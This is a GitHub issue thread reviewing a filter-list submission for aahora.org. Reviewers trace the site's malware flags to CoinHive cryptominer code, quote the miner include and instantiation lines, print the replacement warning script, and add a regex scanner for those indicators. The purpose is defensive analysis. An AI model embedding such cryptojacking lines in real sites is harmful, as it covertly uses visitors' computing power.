Closed iam-py-test closed 3 years ago
It looks like the official website of some sort of organization to me. Which part of the site is malicious? Is there a specific page?
https://www.facebook.com/fundacionahora/
I looked at the Facebook link and it looked official. The whole thing is in another language so I am not sure what it says. Maybe it got bought by someone else and is no longer malware, or is infected? @DandelionSprout what do you think?
Which part of the site is malicious? Is there a specific page?
The scans flagged the homepage as having malware but most reported the host as malware too
Looking at the code, it seems like maybe it was flagged because of this:
var miner = new CoinHive.Anonymous('w9WpfXZJ9POkztDmNpey3zA1eq3I3Y2p', {throttle: 0.3});
Or this
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
@llacb47 @DandelionSprout should I close this issue or do you think further investigation is needed?
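As an added example (not code from this issue or from the site), here is a small scanner that looks for the two CoinHive indicators quoted above in raw page HTML, so a report like this one can point at the exact lines; the indicator patterns are assumptions modelled on those two snippets, and the sample page is constructed.

```javascript
// Indicator patterns (assumed, based on the two lines quoted in this thread).
const MINER_INDICATORS = [
  // External miner library include, e.g. <script src="https://coinhive.com/lib/coinhive.min.js">
  {
    name: "coinhive-script-include",
    re: /<script[^>]+src=["']https?:\/\/(?:www\.)?coin-?hive\.com\/lib\/[^"']+["']/gi,
  },
  // Miner instantiation with a site key, e.g. new CoinHive.Anonymous('<key>', {...})
  {
    name: "coinhive-miner-ctor",
    re: /new\s+CoinHive\.(?:Anonymous|User)\s*\(\s*["']([A-Za-z0-9]{16,})["']/g,
  },
];

// Returns one finding per match: which indicator fired, the matched text,
// and the site key when the pattern captures one (null otherwise).
function scanForMiner(html) {
  const findings = [];
  for (const { name, re } of MINER_INDICATORS) {
    re.lastIndex = 0; // reset the global regex between calls
    let m;
    while ((m = re.exec(html)) !== null) {
      findings.push({ indicator: name, match: m[0], siteKey: m[1] || null });
    }
  }
  return findings;
}

// Constructed sample page, modelled on the two lines quoted in this thread.
const SAMPLE_HTML = `<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('w9WpfXZJ9POkztDmNpey3zA1eq3I3Y2p', {throttle: 0.3});
</script></head><body>Hola</body></html>`;

// Constructed clean page for comparison: no findings expected.
const CLEAN_HTML = `<html><head><script src="/js/app.js"></script></head><body>Hola</body></html>`;

console.log(JSON.stringify(scanForMiner(SAMPLE_HTML), null, 2));
```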
It looks like the CoinHive script at https://coinhive.com/lib/coinhive.min.js
was replaced with another script:
// Credit to https://w3bits.com/javascript-modal/
let createModal = (modalContent) => {
    let modal = document.createElement('div'),
        modalStyle = document.createElement('style'),
        modalCSS = '.js-modal{ position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); background-color: rgba(0, 0, 0, .8); width: 100%; height: 100%; z-index: 999999; } .js-modal-inner{ background-color: rgba(174, 145, 93, .9); position: relative; padding: 50px; font-size: 24px; max-width: 650px; top: 50%; left: 50%; transform: translate(-50%, -50%); color: #000; border-radius: 10px; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: normal; text-align: center; } .js-modal-inner a { color: #000; text-decoration: underline; } .js-modal-close{ position: absolute; top: -10px; right: 0px; background-color: black; color: #eee; border-width: 0; font-size: 10px; height: 24px; width: 24px; border-radius: 100%; text-align: center; font-family: Arial; cursor: pointer;}',
        modalClose = '<button class="js-modal-close" id="js_modal_close">X</button>',
        theBody = document.getElementsByTagName('body')[0],
        theHead = document.getElementsByTagName('head')[0];

    // Add content and attributes to the modal
    modal.setAttribute('class', 'js-modal');
    modal.innerHTML = '<div class="js-modal-inner">' + modalContent + modalClose + '</div>';
    theBody.appendChild(modal);
    // Reuse the variable to hold the close button element now that it is in the DOM
    modalClose = document.querySelector('#js_modal_close');

    // Add the modal styles dynamically
    if (modalStyle.styleSheet) {
        modalStyle.styleSheet.cssText = modalCSS;
    } else {
        modalStyle.appendChild(document.createTextNode(modalCSS));
    }
    theHead.appendChild(modalStyle);

    // Close the modal on button-click
    if (modalClose) {
        modalClose.addEventListener('click', function() {
            modal.remove();
            modalStyle.remove();
        });
    }
}

// Show it up when loading starts
window.addEventListener('load', function() {
    /* Remember to escape the characters to their respective valid HTML entities, for eg. ' will become \' */
    createModal('This website attempted to run a cryptominer in your browser. <a href="https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies">Click here for more information</a>.');
});
Closing issue
Fun fact: Microsoft Defender on my PC seemingly detects the scripts and script-lines above, as if my GitHub e-mail notifications with them are themselves CoinHive viruses. 😅
The site seems to be quasi-safe after Troy Hunt was able to deactivate CoinHive on that site, seemingly: https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies/
As such, I at least presume that there's no immediate need to add aahora.org to my list.
Yes. I am sorry for the error; I did not realize that
Which entry/entries are you submitting?
aahora.org$all
Which things do they block, hide, or unbreak?
Malware. See these for more information:
https://www.virustotal.com/gui/url/c5e388bc7c4f32f038e1ffaf055368c55b197251a9969c746a5f5ed7852f4ec4/detection
https://www.fortiguard.com/webfilter?q=aahora.org
https://safeweb.norton.com/report/show?url=aahora.org
https://www.urlvoid.com/scan/aahora.org/
https://quttera.com/detailed_report/aahora.org
https://sitecheck.sucuri.net/results/aahora.org
https://github.com/iam-py-test/my_filters_001/commit/b0b68fbd76522683cad733ee03f90d057e2b55eb
https://quttera.com/detailed_report/coin-hive.com
https://www.virustotal.com/gui/url/993da527c38d30523da34f9bcf14e3b3b82ef7ce0c1a90604fedcff7587c7ecc/detection
https://www.virustotal.com/gui/domain/aahora.org/detection
https://www.virustotal.com/gui/domain/www.aahora.org/detection
https://www.virustotal.com/gui/url/9ff23b338f715e4c8ebeb2429c9145c3f433a9eb9d2a72fe3d62f3b80d133b27/detection
https://www.scumware.org/search.php (complete the captcha and enter aahora.org to get results; strangely, it does not allow the report to be linked)
The response: https://github.com/iam-py-test/Badware-Reports-1/blob/main/malware_page_content/malware_web20aahora.org.txt
Which of my lists are you submitting it to?
Antimalware
Which adblocker(s) and version did you use when writing and testing the entries?
Other(s):
Adblocker version(s): uBlock Origin development build v1.35.3b7
Which filterlists did you use? Failing to tell this will temporarily close the report until it has been told.
(Optional) Which browser(s) and version did you use?
Edge Version 91.0.864.37